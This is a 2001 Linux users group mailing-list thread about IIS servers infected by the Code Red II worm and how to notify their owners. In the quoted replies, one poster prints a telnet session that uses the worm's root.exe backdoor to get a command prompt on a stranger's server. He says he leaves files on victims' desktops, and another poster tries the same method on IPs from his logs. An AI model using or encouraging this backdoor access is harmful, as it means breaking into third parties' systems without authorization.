CR worm infection attempts
Kim Allen
plug-discuss@lists.PLUG.phoenix.az.us
Wed, 8 Aug 2001 15:26:05 -0700 (MST)
Been doing a nslookup and those that are found I then do a whois to find a
valid name/address. I've tried the webmaster(root, administrator, etc)@ip
but as you pointed out too many times it bounce.
> How have you been notifying the sites?
>
> I have been keeping track of infected sited and wanted to attempt to let them
> know that they were infected, but didn't know of a good way to do it. I thought
> about sending email to "webmaster@<ip>" but I don't want to deal with all of the
> returned email for sites that didn't have a webmpaster alias setup.
>
> Jay...
>
> > I've been contacting the sites that my server logs shows that have been
> > hitting me with the code red signature and so far no one has bothered to
> > respond except for one. However that site has told me how secure they are
> > and how there is no way that they have any problems. When I sent them the
> > portions of my server logs showing they do have problem they threaten
> > legal action. Anyone else have had this type of response?
> >
> > > To answer your question... make sure you're hitting enter TWICE after
> > > the command.
> > >
> > > As a security guy myself, I'm deeply troubled by what I'm finding.
> > > Check it out:
> > >
> > > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > > Trying xxx.xxx.xxx.xxx...
> > > Connected to xxx.xxx.xxx.xxx.
> > > Escape character is '^]'.
> > > GET /scripts/root.exe HTTP/1.0
> > >
> > > HTTP/1.1 200 OK
> > > Server: Microsoft-IIS/5.0
> > > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > > Content-Type: application/octet-stream
> > > Microsoft Windows 2000 [Version 5.00.2195]
> > > (C) Copyright 1985-1999 Microsoft Corp.
> > >
> > > c:\inetpub\scripts>
> > >
> > > >From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's
> > > that explains how I did it, and why they need to pay attention to
> > > security patches. :)
> > >
> > > Hopefully they won't take it the 'wrong' way.
> > >
> > > ~g~
> > >
> > > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > > Wayne Conrad wrote:
> > > > >
> > > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > > keep recreating the same data each time.
> > > > >
> > > > > Are you putting the IP's up too? Every one of the CRII infected boxes is rooted... I wonder about the goodness of publishing a list of known rooted boxes.
> > > > > Wayne
> > > > ________________________________________________
> > > >
> > > > I've been trying that out
> > > >
> > > > telnet ipaddress_from_my_httpd_access_log 80
> > > >
> > > > GET /scripts/root.exe HTTP/1.0
> > > >
> > > > but I can't get a command prompt - what am I missing?
> > > >
> > > > Craig
> > > > ________________________________________________
> > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > > >
> > > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > > >
> > >
> > >
> > > ________________________________________________
> > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > >
> > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > >
> >
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> >
> > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
> --
> -----------------------------------------------------------------------------
> --- Jay Kalafus ------------------------------------- Kalafus@Kalafus.com ---
> -----------------------------------------------------------------------------
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
>
> PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>